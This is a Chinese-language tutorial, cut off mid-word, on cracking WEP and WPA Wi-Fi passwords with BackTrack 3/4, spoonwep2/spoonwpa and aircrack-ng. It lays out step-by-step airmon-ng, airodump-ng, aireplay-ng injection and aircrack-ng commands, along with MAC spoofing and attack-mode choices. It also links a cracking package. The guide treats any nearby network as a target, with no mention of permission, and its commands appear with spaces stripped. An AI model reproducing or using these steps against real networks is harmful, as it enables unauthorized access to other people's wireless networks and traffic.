bt4无线网络破解教程

bt4破解教程一、准备篇1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。2、带无线网卡的电脑一台（笔记本台式机均可，只要无线网卡兼容BT3），我用的是三星NC10的上网本。3、2G以上优盘一个（我用的是kingston8G的）4、搜索下载BT3，约800兆。或BT4，约900兆。BT3下载地址：下载地址：注：BT3全称BackTrack3，与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普及，使得破解可让普通用户轻易言之。5、搜索下载spoonwep2中文包。地址：=//yinghu/上传分享/2008/11/13/中文包_spoonwep2.rar&vid=0注：spoonwep2就是我们的破解软件，一个非常强悍的图形化破解WEP无线网络密码的工具。二、安装篇1、将优盘格式化，配置如下图，唯一要注意文件系统选为FAT32就可以了。2、将刚才下载完成的bt3解压缩，复制到优盘，完成后会看到优盘目录下有两个文件夹，一个boot一个BT3。如下图：3、开始安装bt3系统。点击开始-运行，输入CMD,然后回车，进入命令行模式。首先输入你优盘的盘符，我这里是h盘，输入h：然后回车，接下来输入cdboot回车，进入到boot文件夹下，最后bootinst.bat回车，就会开始安装BT3，如下图：然后安装会出现一个提示画面，我们别去管它，直接按任意键继续按任意键后，电脑会自动设置引导记录，整个过程大概10秒左右。出现下面画面后，此优盘就可以引导系统进去bt3了。4、集成spoonwep2软件。首先把我们先前下载的spoonwep2解压缩，里面是六个扩展名为lzm的文件，将这六个文件复制到优盘\bt3\modules文件夹下，如图：这样我们的bt3系统已经集成安装完毕了，可以动手破解了。三破解篇1、将安装好系统的优盘插入电脑，重启后进入bios，设置优盘为电脑第一启动顺序。（这个如果没设置过，可以问一下其他人，或者在网上找找设置方法，每台电脑进入bios的方法也不同，如开机按F2，Del，F1等等）2、设置优盘启动后，电脑会自动带入我们进入bt3操作系统（如果出现界面选择，你要选择vesamode），系统界面是这样的（漂亮吧）：开始输入指令ifconfig-a查看网卡（之后只出现eth0和lo则表示你的无线网卡没有被识别，要是有eth0、wlan、lo等则表示可以）如果出现wlan网卡（本机无线网卡），则进行ifconfig-awlan0up（此命令用于加载网卡，有的时候直接执行spoonwep是不可以的，需要加载）然后执行ln-fsbash/bin/sh再执行ls-all/bin/sh（显示bash为成功，显示dash为失败）现在开始破解1.在shell窗口中输入ifconfig命令，出现如下信息：lonowirelessextensions.eth0nowirelessextensions.eth1IEEE802.11gESSID:Nickname:Mode:（......）Frequency:2.452GHzAccessPoint:00:0F:B5:88:AC:82BitRate:0kb/sTx-Power:18dBmSensitivity=0/3Retry:offRTSthr:offFragmentthr:offEncryptionkey:offPowerManagement:offLinkQuality=0/94Signallevel=-95dBmNoiselevel=-95dBmRxinvalidnwid:0Rxinvalidcrypt:0Rxinvalidfrag:0Txexcessiveretries:0Invalidmisc:0Missedbeacon:02.找出你的无线网卡名字，我这里是eth1.再启动你的网卡为Moniter模式(输入airmon-ngstarteth111)。再输入ifconfig命令，返回如下信息：lonowirelessextensions.eth0nowirelessextensions.eth1IEEE802.11gESSID:Nickname:Mode:MonitorFrequency:2.452GHzAccessPoint:00:0F:B5:88:AC:82BitRate:0kb/sTx-Power:18dBmSensitivity=0/3Retry:offRTSthr:offFragmentthr:offEncryptionkey:offPowerManagement:offLinkQuality=0/94Signallevel=-95dBmNoiselevel=-95dBmRxinvalidnwid:0Rxinvalidcrypt:0Rxinvalidfrag:0Txexcessiveretries:0Invalidmisc:0Missedbeacon:03.输入命令airodump-ng-c11--bssid00:1A:01:8D:C3:B2-woutputseth1.命令中的11表示要破解的频道号，bssid后面的数字表示破解目标的MAC物理地址，outputs表示要生成的包的名称。回车运行。4.再开一个shell输入aireplay-ng-10-etargetnet-a00:1A:01:8D:C3:B2-h00:A1:C1:D8:A5:B6eth1其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址，00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址5.再开一个shell输入aireplay-ng-3-b00:1A:01:8D:C3:B2-h00:A1:C1:D8:A5:B6eth1获取更多的数据包。6.返回数据量到1万的时候就可以破解了。再开一个shell输入aircrack-ng-z-b00:1A:01:8D:C3:B2outputs.cap进行破解。如果破解不成功，让它继续抓包，直到破解。3、启动spoonwep2软件开启一个命令窗口，输入：spoonwep回车后10秒钟左右弹出spoonwep2程序：NETCARD网卡接口选择WLAN0DRIVER驱动选择NORMALMODE模式选择UNKNOWNVICTIM点NEXT转到VICTIMSDISCOVERY窗口CHANHOPPING是全频段扫描（建议选择：FIXEDCHAN，有针对性的扫描）点击右上角LAUNCH按钮(点完后会变成ABORT)这时会弹出抓包窗口，可作为参考，也可不用理会。20秒首先点击左上角下拉菜单选择CHANHOPPING→LAUNCH(点完后会变成ABORT)→会开始自动执行注：ESSID路由广播名称MAC路由的地址CHAN使用的频道POW信号强度DATA数据包CLIS空白代表无客户端，打钩则代表有客户端；（备注：无线网卡搜索一阵子，被搜索到的无线信号的SSID将会列表显示。如果某加密无线信号的CLIS方框内有“勾”，表示该无线信号此刻托有客户端，这时破解会高效、快速一些。如果你选中了这样的的信号，紧接着窗口的下方会显示出客户端代表，你应该把下方的客户端也选中1想参与破解。不要迷信一定要带客户端才能破解，没有客户端的AP也可以破解，里路上POW值大于18的都可以破解的。）有客户端模式比无客户端模式成功率要高，选中打算破解的路由，下面会显示出当前所有链接到这个路由的客户端，选择一个POWERPACKETS都比较高的客户端。然后点SELECTIONOK转到ATTACKPANEL窗口第一个下拉菜单有4个选项，后面3个都可作为无客户端攻击模式，其中：ARPREPLAYATTACK（有客户端时用）P0841REPLAYATTACK(次次选）CHOPCHOP&FORGEATTACK（次选）FRAGMENTATION&FORGEATTACK（首选）第二个下拉菜单有3个选项，其中：???LENGTH(不指定加密位数，首选）128BITSLENGTH（指定128位加密，次次选）64BITSLENGTH（指定64位加密，次选）两个下拉菜单右边的InjRate是每秒发包数量，选默认的600即可。选择好两个下拉菜单，点击左边LAUNCH按钮开始自动破解，破解速度和信号强度成正比。最下面的WEPKEY就是破解出来的密码，无需输入冒号。注：有客户端模式比无客户端成功率要高。注：破解WPA加密时，输入命令为spoonwpa，其他操作步骤不变（但一定需要有客户端连接才能破解）BT4破解教程一、spoonwep-wpa破解工具用于BT4下的deb安装包迅雷下载地址：(已经修正下载地址，打开迅雷，然后复制以下地址即可)thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa二、运行unetbootin制作BT4的U盘启动系统。点确定就开始制作了。在这里需要泡杯茶点支烟等一下。从ISO文件里提取文件拷贝到U盘里需要一段时间。完成之后，不要重启，再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面，自己记好它好的名字，方便到BT4下找到它。三、启动BT4在BIOS里面设置从U盘启动，这个无法截图，自己摸索吧。呵呵~~四、进入BT4登陆的用户名：root，密码：toorstartx命令启动图形化界面。五、安装spoonwep-wpa-rc3.deb包点击左下角的开始菜单，点击一个叫systemmune的弹出菜单，再点击“storeagemedia”，会打开一个窗口，点击窗口上面有个刷新的按钮，在窗口下面空白的地方会列出你的硬盘和外设，进入U盘，找到刚才放入的spoonwep-wpa-rc3.deb，把这个文件复制到BT4的桌面（其实就是/root），可以直接拖到桌面，打开命令行窗口运行“dpkg-ispoonwep-wpa-rc3.deb”稍等几秒中，桌面上出现desktop的文件夹，里面就有了spoonwep2+spoonwpa，好了，大功告成，直接单击图标就能运行spoonwep2或spoonwpa了。也可以输入以下命令执行:spoonwep2执行:spoonwep2spoonwpa执行:spoonwpa六、开始破解！！！！1、打开一个SHELL，输入ifconfig-a2、可以输入macchange-m00:11:22:33:44:55wlan0来改变本机的MAC地址，3、输入airmon-ngstartwlan064、输入aireplay-ng-9mon05、加载网卡输入ifconfig-awlan0up6、输入ln-fsbash/bin/sh7、输入ls-al/bin/sh(这个命令可以显示是否设置成功，显示bash为成功，dash为失败)【spoonwep2破解法】输入spoonwep2回车后就会弹出spoonwep2的窗口。点击SPOONWEPSETTINGS,在NETCARD里选WLAN0，在DRIVER里选NORMAL,在MODE里选UNKNOWNVICTIM,再点击NEXT、点击LAUNCH进入搜索，然后关闭spoonwep2再开一下，点击SPOONWEPSETTINGS,在NETCARD里选MON0，在DRIVER里选NORMAL,在MODE里选UNKNOWNVICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦，选定1个网卡点击SELECTIO